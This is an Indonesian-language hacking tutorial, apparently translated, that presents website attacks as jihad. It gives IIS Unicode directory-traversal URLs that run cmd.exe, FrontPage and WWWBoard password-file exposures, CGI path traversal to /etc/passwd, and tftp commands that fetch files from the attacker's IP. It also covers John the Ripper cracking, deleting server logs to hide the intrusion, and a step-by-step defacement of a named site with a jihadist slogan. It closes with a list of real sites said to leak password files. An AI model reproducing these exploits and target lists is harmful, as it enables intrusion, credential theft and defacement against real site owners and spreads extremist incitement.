Program ini sama dengan dua program sebelumnya, hanya saja program ini khusus mencari bugsUnicode.

Sampai di sini kita telah mengetahui cara mencari bugs (celah, titik lemah) pada sebuah situs.
Langkah berikutnya adalah, bagaimana memanfaatkan bugs yang sudah kita temukan.

Cara menembus bugs:

a. Posisi penembusan bugs:
http://www.xxxxx.com/scripts/..&Aa....exe?/c+dir+c:\ yaitu, setelah alamat utama URL (setelah penulisan .com). Mungkin akan ada yang bertanya, Apanya yang kelihatan? Dan bentuknya kayak apa? Jawabannya sederhana saja, kalau hal ini Antum tulis di DOS, akan muncul file-file DIR. Nah, cara menampakkan file-file pada explorer, kira-kira sama dengan cara dalam DOS. Wallôhu A‘lam…

b. Penjelasan tentang berbagai macam bugs dan cara memanfaatkannya:

1. Penjelasan tentang bugs pada Front Page dan cara memanfaatkannya:

Bugs Front Page adalah bugs yang banyak sekali tersebar di situs-situs yang ada. Biasanya, bentuknya adalah sebagai berikut: www.***.com/_vti_pvt
Maka, yang dimaksud di sini, bugs nya adalah _vti_pvt. Dari sini nanti, akan terlihat di depan Antum file-file Front Page dalam situs dan nama operatornya.

Catatan penting:
Bugs ini hanya bisa ditembus dan hanya ada pada situs yang menggunakan Front Page, dan tidak cocok untuk selain ini. Sehingga, Antum harus tahu lebih dahulu apakah situs itu memakai Front Page atau tidak, dengan masuk ke situs: http://www.netcraft.net

Setelah masuk, ada kotak segi panjang di hadapan Antum. Nah, masukkan nama situs yang akanAntum cari data tentangnya. Yang penting bagi kita hanya satu file saja, yang lain biasanya tidak terlalu penting, file itu adalah: sercive.pwd

Kalau kita buka dengan explorer, akan kita lihat pass wordnya masih samar (dalam bentuk kode). Jadi bentuk adalah sebagai berikut:
-FrontPage-
Ekendall: bYld1Sr73NLKo
Louisa: 5zm94d7cdDFiQ

Di sini kita lihat, situs itu memakai dua operator, yaitu Ekandall dan Louisa. Tentu, kedua kode di atas akan kita pecahkan dengan program Jhon The Ripper. Setelah berhasil memecahkan kode Password,kita buka kembali Front Page, lalu klik: File
�� Open Web. Lalu, tulislah alamat situs itu, maka akan segera muncul tampilan utamanya (home). Sekarang, silahkan rubah apa yang Antum mau rubah, dan setelah itu jangan lupa Save or publish.

Setelah itu, Antum akan diminta mengisi user name dan password, ini mudah Insyâ Alloh. Tulis sajauser name dan passwordnya seperti biasa, lalu klik sign.

Situs di bawah ini, akan kita coba sebagai percobaan, dengan bantuan Alloh:
http://www.heyerl st.org/garderobe/_vt _pvt (silahkan coba ya… --penerj.)

2. Penjelasan tentang bugs WWWBoard

Ini adalah bugs yang paling mudah pada Front Page. Taruhlah situs yang akan kita serang adalahhttp://www.boardprep.net/ (Sekali lagi ini sekedar contoh), dan Antum lihat di belakangnya belum ada bugs nya. Sekarang, kita tambahkan di belakangnya: wwwboard/passwd.txt

Sehingga, alamat URL nya menjadi: http://www.boardprep.net/wwwboard/passwd.txt
Ketika Antum buka alamat URL di atas, akan muncul: Cknouse: aexMVWnDOyrdE
Artinya, user namenya adalah cknouse, sedangkan kode passwordnya adalah: aexMVWnDOyrdE

Pecahkan sandi di atas dengan program Jhon The Ripper. Ok, sekarang Antum sudah punya user namenya dan sekaligus kode passwordnya. Lalu, apa langkah berikutnya? Bagaimana cara mengubah tampilan utama situs?

Sekarang, kita buka program FTP, setelah itu ketikkan: ftp.domen.com. Perhatikan, kata domen.com gantilah dengan alamat situs yang sudah Antum pegang user name dan passwordnya. Setelah itu, silahkan isi username dan passwordnya, dan masukklah ke dalam situs. Selanjutnya, buatlah satu tampilan baru dan beri nama file: index.html, setelah itu
silahkan di upload ke situs.

Untuk mendownload program FTP, klik link di bawah ini:http://members.home.nl/patrick.pagina/temp/Ws-ftp32. zip

3. Penjelasan tentang CGI Bugs dan cara memanfaatkannya:

Ada bugs-bugs yang langsung bisa diaplikasikan melalui explorer, seperti Unicode, dan beberapa bugspada CGI. Hanya saja, sebagian –atau mungkin sebagian besar—bugs yang diaplikasikan lewat explorer, hanya dapat dipastikan keberadaannya melalui explorer.
Bugs-bugs yang bisa dimanfaatkan langsung dari explorer contohnya adalah: /cgi-bin/passwd.txt

Kalau situsnya adalah: www.suatusitus.com, maka pada explorer Antum tulis begini:www.sebuahsitus.com/cgi-bin/passwd.txt

Selanjutnya, bugs ini akan menampilkan buat Antum user name dan password-password yang digunakan oleh para pengguna situs. Seperti pimpinan redaksi, serta siapa saja yang diperbolehkan masuk ke dalam gudang data situs itu.

Tentu saja, jangan sekali-kali Antum coba menggunakan bugs ini sekarang, kecuali kalau Antum ingin menyerang situs di Zimbabwe, yang oleh pengelolanya sudah ditelantarkan sejak 10 tahun lalu. Bugs ini mungkin sudah tidak lagi cocok untuk situs tersebut, karena sudah sangat populer.
Khusus untuk mengambil kelemahan dari file-file CGI & Perl sehingga kita bisa sampai kepada .etc/passwd, maka kita akan mengambil bugs jenis Show Files. Ketika file /cgi-bin/apexec.pl? danpassword, maka kita harus menggunakan bugs ini untuk bisa sampai kepada:
http://www.target.com/cgibin/ apexe...te=../../../../../../../../../etc/resolv.conf.html&passurl=/category/

dengan mengganti phat nya sesuai dengan nama file yang diinginkan. Ini untuk Perl. Hal yang sama juga berlaku pada CGI (/cgi-bin/hsx.cgi?) ketika file ini ditemukan di /cgi-bin/
Silahkan Antum coba bugs berikut ini:
http://www.Target.com/cgi-bin/hs .c..../etc/passwd

Cara paling baik untuk mendapatkan file ini adalah dengan memakai metode acak, atau dengan menggunakan program Scan sehingga bugs-bugs yang ada pada situs bisa dideteksi.
Letakkan file-file itu pada kolom bugs, seperti /cgi-bin/hsx.cgi, ketika itu ditemukan, bugs sudah bisa digunakan, dengan bantuan Alloh.

4. Penjelasan tentang Bugs IIS dan cara memanfaatkannya:

IIS adalah Internet Information Service
Biasanya kita menggunakan bugs-nya dengan program Unicode’s, dan itu jenisnya banyak sekali, di antaranya:
http://www.xxx.com/scripts/..&Aacu...d.exe?/:c+dir+chttp://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+chttp://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+chttp://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+chttp://www.xxx.com/scripts/..&Aacu...d.exe?/:c+dir+chttp://www.xxx.com/scripts/..&Aacu...d.exe?/:c+d r+chttp://www.xxx.com/scripts/..&Aacu.../cmd.exe?/c+dir +c:/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/sy stem32/cmd.exe?/c+dir+c:/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe ?/c+dir+c:

 

CARA MEMANFAATKAN IIS BUGS LEBIH DARI SATU CARA:

Bugs-bugs IIS bisa langsung kita praktekkan melalui explorer dengan memanfaatkan file cmd.exe agar semua perintah (command) yang kita minta terlaksana.

CONTOH BUGS INI DAN APLIKASI COMMAND:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

COMMAND UNTUK MEMBUAT PENUNJUK BARU:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ

COMMAND UNTUK MEN-DELETE PETUNJUK:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ

COMMAND UNTUK MENG-COPY:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

COMMAND UNTUK MENGHAPUS:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp

COMMAND UNTUK ME-RENAME FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
COMMAND UNTUK MELIHAT ISI FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm 

COMMAND UNTUK MENULISKAN SESUATU DALAM FILE APA SAJA:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt

INGAT: Kadang kita perlu merubah nama petunjuk (exentition) menjadi: msadc, scripts, _vit_admin, iisadmpwd, _vti_bin, cgi-bin, .samples.



SEKARANG, UNTUK MERUBAH TAMPILAN AWAL (HOME) SEBUAH SITUS, MAKA HARUS:

• Menuliskan sesuatu pada Home dengan menggunakan perintah echo
• Meng-apload tampilan buatan Antum melalui program TFTP
• Menuliskan sesuatu pada file Home sebuah situs (file: index.html) adalah menggunakan command echo.

Sebagai dasar, Antum harus terlebih dahulu meng-copy file cmd.exe ke folder scripts, caranya seperti ini –sekedar contoh saja:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

Nah, setelah meng-copy file ini, selanjutnya bisa dilakukan pemeriksaan terhadap bugs lain yang ada di situs tersebut, caranya:
http://www.xxx.com/scripts/DJ.exe/c+dir+c:

Setelah itu, command echo baru bisa dijalankan, caranya adalah:
http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm

CATATAN PENTING:
File indeks utama sebuah situs tidak selalunya bernama index.htm, bisa saja namanya: default.html, index.html, default.asp, default.htm. Jadi, pastikan dulu nama file indeksnya.
Tapi, biasanya index.htm lah yang sering dipakai. Ada kemungkinan juga bahwa file indeks berada di selain folder wwwroot, jadi harus dicari.

CARA MENG-UPLOAD TAMPILAN UTAMA (BIKINAN KITA, PENERJ.) DENGAN PROGRAM TFTP:
Ingat ya… program TFTP ini bisa Antum temukan dengan meng-klik link yang sudah kami sebutkan di atas, berkat anugerah Allah.
Aplikasi bugs nya juga bisa dilakukan dengan cara yang sudah kita jelaskan di atas. Sekarang, silahkan mendownload program FTP, program ini kecil ukurannya dan gratis. Letakkan program ini pada directory c:
Taruh file index (bikinan Antum) atau lebih tepatnya tampilan utama buatan Antum yang akan Antum upload, pada directory c: juga.
Sudah… sekarang jalankan program TFTP nya, kalau sudah siap maka masukkan perintah berikut ini:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex.htm

Perintah tftp.exe di atas, maksudnya adalah program FTP yang digunakan untuk meng-upload.
Sedangkan “i-” adalah parameternya.
Dan y.y.y.y adalah IP address Antum.
Untuk perintah lainnya, menurut saya tidak terlalu penting untuk saya jelaskan.
Untuk C:inetpubwwwrootindex.htm, maksudnya adalah posisi directory yang dituju seperti telah saya sebutkan. Tetapi, antara satu situs dengan situs lain tidak selalu sama letaknya, maka dari itu harus benar-benar dipastikan dulu letak directory tersebut sebelumnya.
Terakhir, untuk menghapus log caranya adalah:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
Begitulah kira-kira cara memperlakukan server-server situs yang ada di windows dan IIS. Adapun situs-situs yang menggunakan server Apache on Linux misalnya, maka cara logikanya sama sekali berbeda, yang sama hanya pada penyerangan melalui ftp server. Sebab, kebanyakan copy-an program ftp itu memiliki banyak bugs dan bisa dimanfaatkan.
1. Penjelasan Tentang Bugs Pada Unicode Dan Cara Memanfaatkannya:
Pertama, bugs-bugs pada Unicode:
UNICODE - Internet Information Service IIS4 - IIS5
Unicode adalah: Sistem operasi untuk menjalankan data-data pada Internet. Ada yang versi 4.0 ada yang 5.0
Jadi pengertian Unicode adalah sekumpulan bugs yang ada dalam sekumpulan operator file, yang biasanya digabungkan dengan IIS 4.0 atau IIS 5.0, yang mana biasanya juga dibarengi dengan NT4 atau Win2k.

CARA MENEMUKAN BUGS-BUGS INI:
Untuk menemukan bugs-bugs ini, bisa dengan memakai dua cara:
Pertama, memakai program yang sesuai dan khusus yang berfungsi untuk menemukan bugs-bugs ini. Baik dengan program yang bekerja untuk sistem operasi Windows, maupun dengan Shell yang bekerja untuk sistem operasi Linux.
Kedua, dengan mengaplikasikan bugs langsung pada situs.

BAGAIMANA CARA MEMANFAATKAN BUGS PADA UNICODE?
Pada penerapan bugs yang ada dalam IIS 4.0 mau pun IIS 5.0, file CMD akan memulai dengan memecahkan kode pada Unicode ketika contoh yang diberikan keliru. Nah ketika inilah, bugs itu bisa dimanfaatkan.

PERINTAH-PERINTAH DALAM FILE CMD:
Perintah di sini berfungsi untuk membuat penunjuk baru, atau me-remove penunjuk, copy-paste, menghapus dan merubah nama file, melihat isi file, menulis di dalam file apa saja, dan perintah untuk menarik file apa saja. Contohnya adalah sebagai berikut:
Pertama dengan menjalankan file ssinc.dll, caranya:
Buat page dengan nama test.shtml, letakkan page ini dalam folder wwwroot/hEx/test.shtml
Penulisan Kode ini ada dalam layar explorer, di mana huruf A bisa ditulis lebih dari 2049 kali. Sekarang, kita meminta tampilan itu ditayangkan di layar, setelah menuliskan: http://www.xxx.com/test.shtml
Setelah itu, akan segera muncul tampilan di hadapan Antum. Sekarang Antum bisa menuliskannya, sehingga terbentuklah masalah berupa Acces denied. Jika perintah error itu nomornya 500, maknanya adalah Antum belum melakukan langkah yang benar, dan Antum harus mengulanginya.
Cara kedua, dengan menggunakan program NC.exe. Pada kondisi ini, file di upload di dalam folder Temp pada penunjuk Windows.
Nah, perintah-perintahnya bisa dijalankan melalui DOS. Dan asal tahu, folder Temp bisa diupload.
Cara ketiga, dengan menggunakan aksi cracking terhadap server menggunakan program yang sesuai dengan tujuan ini. Tetapi, cara seperti ini sering sekali tidak terlalu bermanfaat.
Cara keempat, mencari file root.exe, sensepost.exe, shell.exe, w3svc.exe lalu meng-copy nya ke folder c:\inetpub\scripts, setelah itu memanfaatkan bugs melalui jalan ini.
Sampai di sini kami telah memberikan penjelasan sekaligus contoh, tentang bagaimana menyerang situs melalui bugs-bugs yang ada di dalamnya.
Tetapi ada yang lebih penting lagi, bahwa ada bugs-bugs yang bisa menghantarkan kita untuk memperoleh file password dari sistem operasi. Jika kita berhasil mendapatkan file ini dan memecahkan kodenya, seluruh sistem operasi akan “tunduk” kepada kita, dan semua situs yang ada di bawah server tersebut bisa kita arahkan sesuka kita. Nah, inilah yang akan kita jelaskan pada bagian berikut ini dengan bantuan Allah.


FILE-FILE PASSWORD, DIAPAKAN?


Sebelum memulai pembahasan bagian ini, sebaiknya –tapi nggak harus sih—Antum melihat kembali penjelasan tentang pengertian file password pada pembahasan awal, yang berisi tentang istilah-istilah dasar dan definisinya.

Jika file password terselubung (ter-shadow), apa yang harus kita lakukan? Sekarang nich –misalnya—semua file password ter-shadow, tapi…ternyata ada cara untuk membongkarnya.
Jika ada file password yang tershadow, maka Antum harus mencari file yang namanya shadow.

Terus, di mana kita bisa menemukan letak file shadow di dalam sistem?
File shadow ini memang hanya terletak di direktori-direktori tertentu. Masing-masing sistem operasi punya tempat sendiri dalam meletakkan file ini. Nah, berikut ini tabelnya:

Untuk Linux: etc/shadow simbolnya adalah: *
Untuk SunOs: /etc/master Passwd atau /etc/shadow simbolnya adalah: *
Sistem SunOs punya banyak simbol password, tapi yang paling populer adalah: *
Untuk FreeBsd: /etc/master Passwd atau /etc/shadow simbolnya adalah: *
Untuk simbol versi yang baru bentuknya adalah: x
Untuk IRIX: /etc/shadow simbolnya adalah: x
Untuk AIX: /etc/security/passwd simbolnya adalah: !
Untuk ConvexOS: /etc/shadow atau etc/shadpw simbolnya adalah: *

Jadwal ini sangat memudahkan pekerjaan kita. Karena, misalnya Antum menjumpai password dalam simbol !, berarti password itu tertulis di dalam /etc/security/passwd.
Selanjutnya, Antum silahkan memanfaatkan tabel di atas.

Inilah contoh tentang file shadow. (file Shadow adalah file yang memuat kode password yang benar)

File shadow yang membahas tentang kode terselubung, langkah terakhirnya adalah menggabungkanfile password dengan file shadow.

Saya sarankan, untuk menggabungkan file password dan file shadow, sebaiknya Antum menuliskancommand yang akan saya sebutkan nanti, di dalam program John the ripper. Berikut ini link untuk mendown load program John The Ripper: http://www.openwall.com/john

Saya kasih tahu dulu ya… bahwa program ini khusus untuk memecahkan kode password. Hanya saja, ada command khusus yang bisa difungsikan untuk menggabungkan file shadow dan file password, command ini dilakukan untuk menjamin tidak terjadinya error ketika menggabungkan keduanya. Command itu adalah: Unshadow passwd.txt shadow.txt

Kalau penggabungan dengan cara ini tidak berhasil, Antum bisa saja melakukannya dengan cara manual, dan itu mudah. Akan tetapi untuk menjamin tidak terjadinya kesalahan ketika menggabungkan dengan manual seperti ini, Antum ganti simbol x pada file password dengan “L” yang ada dalam file shadow. Selanjutnya, lakukan hal yang sama (mengganti setiap simbol x yang ada di file password)

Setelah dua file ini berhasil digabungkan, program John The Ripper sudah siap untuk dijalankan. Selanjutnya program ini akan menganalisa kode password (lalu mengeluarkan hasilnya) dengan sangat “cepat”. Tapi, Antum harus sabar ya…sebab analisa ini kadang bisa berjalan berhari-hari (lihat penjelasannya di akhir artikel ini).

Ok… sekarang taruhlah kita udah dapat kode password yang benar, lalu apa yang harus kita lakukan selanjutnya?


CARA MEMANFAATKAN PASSWORD

Antum bisa memanfaatkan passwords suatu situs dengan masuk ke Tel Net. Silahkan masuk ke Tel Net, dan Antum bisa berbuat sesuka Antum. Atau, bisa juga masuk ke program FTP, dan ini lebih mudah dan lebih populer.

Lalu, bagaimana masuk dengan program FTP? Antum bisa memakai salah satu dari sekian program FTP, di antaranya:

Ws_Ftp atau Build 10.4.1 atau CuteFTP 4.2.5

Kalau ini berhasil, sekarang –dengan pertolongan Alloh—kita bisa menyerang situs dan mengganti tampilan awalnya dengan –misalnya—“SITUS INI TELAH DIHACK”. Terus… gimana caranya?

Antum sudah bisa merubah tampilan awal situs ketika password dari situs itu berada di tangan Antum.Setelah Antum tahu passwordnya, silahkan masuk ke situs. Lalu, cari file index, silahkan Antum bukafile ini dan delete saja, atau Antum ganti dengan file lain tapi namanya dibuat sama (index.htm), semua yang kita inginkan itu bisa kita jalankan melalui program Cute FTP atau WS_FTP PRO. Program ini mudah kok, insyâ Allôh…

Antum juga bisa mencoba masuk ke ruang pengaturan (control panel) sebuah situs.

Kebanyakan, ruang pengaturan situs dibuka dengan mengetikkan:

www.namasitusnya.com:2082 Atau: www.namasitusnyaapa.com/cpanel

Ini kalau situs itu menggunakan program Cpanel, tapi program ini paling banyak digunakan oleh situs-situs.

Setelah ini, akan keluar jendela yang meminta Antum menuliskan username dan passwordnya, nah (karena Antum sudah punya) Antum bisa masuk, bi idznillâh…

Di sini akan kita jelaskan juga aksi yang sama dengan di atas, tapi menggunakan program TFTP. Bagaimana merubah tampilan awal situs dan mengupload file dengan menggunakan program TFTP?

Coba Antum bikin file berisi tampilan situs, jangan lupa menuliskan slogan yang Antum inginkan di dalamnya. Kalau sudah, save file tersebut dan beri nama: index.htm, letakkan di drive c:\

Kalau sudah, jalankan program TFTP nya, lalu masukkan command berikut ini:

c:\tftp.exe "-i" 1.1.1.1 GET index.htm dan C:\inetpub\wwwroot\index.htm

Rinciannya adalah berikut ini:

tftp adalah program yang harus ada untuk melakukan upload. Program ini harus aktif ketika commanddijalankan.
“-i” maksudnya adalah parameter yang dipakai untuk membaca data dalam database.
1.1.1.1 adalah nomor IP Antum
GET adalah perintah untuk meminta file, mau dilepas atau didatangkan.
Index.htm adalah nama file di komputer Antum.
\inetpub\wwwroot\ adalah nama penunjuk di server.
Index.htm adalah nama file di server.

Sekarang, ada satu hal penting yang mesti dilakukan ketika Antum meng-hack suatu situs. Yaitu menyamarkan identitas setelah melakukan hack, supaya tidak dikenali oleh pemiliki situs, sehingga dia nanti akan menyakiti atau berbuat jahat kepada kita. Gimana caranya?

Kita tulis command berikut ini pada DOS: c:\ del c:/winnt/system32/logfiles/*.log

Atau, bisa juga kita masuk ke c: lalu ke windows, nah di sana ada file system32, setelah itu kita hapus dan delete semua file yang diakhiri dengan .log.

Sekarang, saatnya kita tambahkan satu point pembahasan penting, yang barangkali akan berguna bagi para ikhwan yang menggunakan sistem operasi Linux dan melakukan hacking. Point itu adalah, bagaimana cara mendapatkan program Shell Account secara gratis. Untuk mendapatkannya, berikut ini penjelasannya:

Sebelumnya, perlu diketahui bahwa Shell Account itu ada dua:
5) restricted 6) non-restricted

Apa bedanya? Kalo restricted harus bayar, tapi Antum bisa memasukkan command berbentuk apa pun. Adapun non-restricted itu nggak bayar (alias gratisan); tapi yang jadi masalah, Antum tidak bisa memasukkan semua bentuk command di dalamnya.

Untuk memperoleh Shell Account gratisan, Antum bisa mengunjungi situs yang menyediakannya. Di antaranya adalah: www.cyberarmy.net

Atau, Antum bisa membuka help, dan mintalah Shell Account. Tentu dia akan bertanya, mengapa kamu menginginkan Shell Account? Jawab aja… saya mau memakainya untuk berlatih mengoperasikan Linux dan Unix, nanti.

Jawaban seperti ini sudah cukup, dia akan memberikan Shell Account kepada Antum.
Command dalam Shell Account itu banyak sekali bentuknya, masing-masing punya keistimewaan, urutannya adalah berikut:
1. Telnet
2. Nslookup, ini akan memberi Antum data-data tentang nameservers.
3. ftp
4. finger
5. trace route
6. dig, command ini biasanya tidak bisa dipakai dalam Shell Account gratisan
7. netstat
8. gcc, ini adalah Compiler untuk bahasa program c
9. gzip, berfungsi untuk membuka file yang di compress
10. lynx, adalah penjelajah (explorer) pada situs internet


PENJELASAN SINGKAT TENTANG PROGRAM-PROGRAM YANG AKAN KITA PAKAI

Pertama, penjelasan tentang program John The Ripper. Letakkan program ini di drive c:
Ingat lo…passwordnya ditaruh di file program, tepatnya di file txt, kasih nama: password. Supaya nanti menjelaskannya enak…

Untuk cara mengaktifkan program ini, Antum harus tahu bahwa program ini dioperasikan di DOS. Jadi, silahkan masuk dulu ke DOS, lalu ketik cd.. sehingga nanti keluar tulisan seperti ini:
C:\>

Setelah itu, tulis john

Sekarang, command yang mau dipakai apa aja…
1. Ada command yang berfungsi kemungkinan-kemungkinan kata yang ada pada deretan kata sandi (password). Bentuknya adalah: john –w:wordlist.txt password.txt
file wordlist adalah file yang berisi kemungkinan kata dan passwordnya yang masih terselubung. Walaupun, saya tidak menganjurkan menggunakan pilihan ini. Wallôhu A‘lam…
2. Command yang berfungsi untuk mencari kata rahasia yang sesuai dengan username, bentuknya adalah: john –single passwd.txt:
3. Command yang hanya berfungsi mencari nomor saja, bentuknya: john –iD:igit passwd.txt
4. Command yang berfungsi mencari huruf alphabet kecil, bentuknya: john –i:Alpha passwd.txt:
5. Command yang berfungsi untuk mencarikan semua kemungkinan kata buat Antum, bentuknya: john –i:all passwd.txt

Ini adalah pilihan terakhit ketika semua usaha gagal, karena pilihan ini sangat panjang tetapi merupakan pilihan terbaik, wallôhu A‘lam…

Baik, sekarang saya sedang bekerja menggunakan pilihan terakhir di atas, program pun berjalan hingga setengah jam, tapi ternyata tidak terjadi apa-apa. Padahal, saya tidak mungkin membiarkan komputer saya hanya mengerjakan satu program saja, lalu apa yang harus saya lakukan?

Gampang, sekarang tekanlah ctrl + shift + c atau ctrl + c

Lalu, bagaimana supaya saya bisa menyempurnakan pekerjaan ini? Tulis saja –selanjutnya—john-restrore, maka program itu akan menyempurnakan sendiri pekerjaannya…
Nah, sekarang untuk percobaan, kita mau menyerang suatu situs, misalnya. Maka, pertama-tama kita coba situs-situs biasa dulu. Jangan langsung situs-situs intelejent salibis seperti Yahoo, salah satunya. Ini mengingat bahwa menyerang situs-situs biasa itu mudah banget…dengan pertolongan Alloh. Jadi, jangan menyerah akhi dari berjihad dengan cara yang sekarang Alloh hadapkan di depan Antum.Jangan banyak bicara sudah…mari kita mulai bekerja!

Program yang wajib ada adalah john the ripper dan WS_FTP pro. Kedua-duanya sudah ada di dalam link yang telah kami sebutkan sebelumnya, berkat anugerah Alloh SWT semata.
Bismillah… kita mulai:

Sekarang, kami beri Antum situs yang ada bugsnya, kita akan coba menembusnya. Situs itu adalah: http://www.dsg-art.com/ (situs ini sekedar sample saja, dan nampaknya bugs pada situs ini sekarang sudah hilang)

Situs ini terkena bugs pada passwordnya, yaitu: wwwboard/passwd.txt
Sekarang, kita tembus bugsnya, tulis: http://www.dsg-art.com/wwwboard/passwd.txt

Tujuannya apa? Agar username dan passwordnya terlihat. Dan benar, akan muncul seperti ini:
jc:GXQ4cN0fhbptw. jc adalah username nya, sedangkan yang berikutnya (GXQ4cN0fhbptw) adalahpasswordnya. Seperti yang terlihat, password ini masih samar, lantas bagaimana cara memecahkannya sehingga kita bisa mendapatkan password aslinya?

Tentu saja dengan program Jhon The Ripper yang sudah kami sebutkan dan jelaskan di atas.
Setelah ketemu, maka sekarang kita telah memperoleh username dan sekaligus password asli dari situs ini. Kalau sudah begini, sudah… aksi hacking berjalan dengan sempurna, semoga Alloh memberkahi Antum semua.

Sekarang kita mau menulis: LA ILAHA ILLALLOH MUHAMMAD ROSULULLOH, SITUS INI TELAH DI-HACK OLEH PASUKAN JIHAD MEDIA, ‘IZZAH ITU HANYA MILIK ALLOH, ROSUL DAN ORANG-ORANG BERIMAN, misalnya. Bagaimana caranya?

Tentu saja dengan program WS_FTP pro.

Ok…sekarang kita letakkan username dan passwordnya di dalam program ini. Setelah itu, kita telah berhasil memasuki “remote” (pusat pengendali) dari situs ini; kalau Antum pengin meluluh-lantakkan situs, tinggal delete saja semua file, selesai dengan tetap memohon pertolongan kepada Alloh.

Dari sekian file, ada file yang namanya index.htm. Seperti telah kami jelaskan, ini adalah nama filedari tampilan utama sebuah situs. Dan tentu saja sudah kita siapkan sebelumnya file lain yang berisi tampilan bertuliskan: LA ILAHA ILLALLOH MUHAMMAD ROSULULLOH, SITUS INI TELAH DI-HACK OLEH PASUKAN JIHAD MEDIA, ‘IZZAH ITU HANYA MILIK ALLOH, ROSUL DAN ORANG-ORANG BERIMAN. 

Sekarang, tinggal kita delete saja file index.htm situs itu, lalu kita masukkan file yang sudah kita siapkan sebelumnya ini (ingat, nama file baru kita ini harus sama: index.htm, penerj.), setelah kita pastikan letak keberadaan file tersebut dalam komputer.

Sekarang, bergembiralah Antum, dan beri kabar gembira orang lain, dengan bantuan Alloh situs ini berhasil kita hack dan meninggalkan pesan buat pengelolanya: bahwa situs ini sudah di-hack.
Dan sebagaimana telah kami jelaskan, agar pemilik situs tidak mendeteksi pelaku serangan ini, kitadelete semua file yang berakhiran log, yang alhamdulillah sudah kita jelaskan di atas.
Sekarang, setelah membaca penjelasan-penjelasan di atas, siapa saja bisa menyerang situs-situs biasa dan situs-situs yang sistem proteksinya lemah, dengan daya dan kekuatan Alloh.

Terakhir, berikut daftar situs-situs yang bisa diserang serta jenis bugsnya. Tapi ingat, sekarang tidak semua bugs dari situs-situs ini masih aktif dan ada, ketika Antum membaca daftar ini. Semoga anugerah Alloh selalu abadi pada diri Antum…

SITUS-SITUS YANG ADA BUGS-NYA:
http://www.efn.org/~dalep/wwwboard/passwd.txthttp://www.lionnet.org.tr/118u/wwwboard/passwd.txthttp://members.mint.net/raske/wwwboard/passwd.txt http://www.avatar-moving.com/kb/wwwboard/passwd.txt http://espa.virtualave.net/wwwboard/passwd.txthttp://mulerider.saumag.edu/wwwboar...oard-passwd.txthttp://www.kcftoa.org/hazmat/wwwboard/passwd.txt http://www.go-steeltown.com/classif...oard/passwd.txt http://www.creative-design.de/kmt/wwwboard/passwd.txthttp://www.kaapeli.fi/~hekata/wwwboard/passwd.txt http://www.go-steeltown.com/invitat...oard/passwd.txt http://www.ica1.uni-stuttgart.de/~k...oard/passwd.txthttp://sitemanager.hypermart.net/wwwboard/passwd.txt http://cgi.snafu.de/utimper/user-cg...oard/passwd.txt http://www.fo sden.org/psf/FFE/wwwboard/passwd.txthttp://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt http://www.cab nessence.com/brian/s...oard/passwd.txt http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txthttp://www.radiocollege.org/rc/wwwboard/passwd.txthttp://www.student.utwente.nl/~here...oard/passwd.txthttp://www.as.ua.edu/arcca/wwwboard/passwd.txthttp://students.cs.byu.edu/~quixote/wwwboard/passwd.txthttp://lrf1.unizar.es/~martin/panze...oard/passwd.txthttp://www.netset.com/~jdennis/wwwboard/passwd.txt http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt http://www.i-55.com/andersoninc/wwwboard/passwd.txthttp://www.volker.de/deutsch/kontak...oard/passwd.txthttp://www.ug.cs.sunysb.edu/~boehme...oard/passwd.txthttp://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt http://www.cabling-design.com/inter...oard/passwd.txt http://www.educanet.net/privado/con...oard/passwd.txthttp://www.zetor.org/scifi/public_h...oard/passwd.txthttp://www.nwlink.com/~nickguy/wwwboard/passwd.txt http://www.dj-pool.de/PoolDeutsch/p...oard/passwd.txt http://gladstone.uoregon.edu/~solsh...oard/passwd.txthttp://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt http://www.freelance-street.co.uk/wwwboard/passwd.txt http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txthttp://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txthttp://www.arts.cuhk.edu.hk/~cmc/in...oard/passwd.txthttp://www.clearlight.com/~brawicz/wwwboard/passwd.txt http://www.yellowstone-natl-park.co...oard/passwd.txt 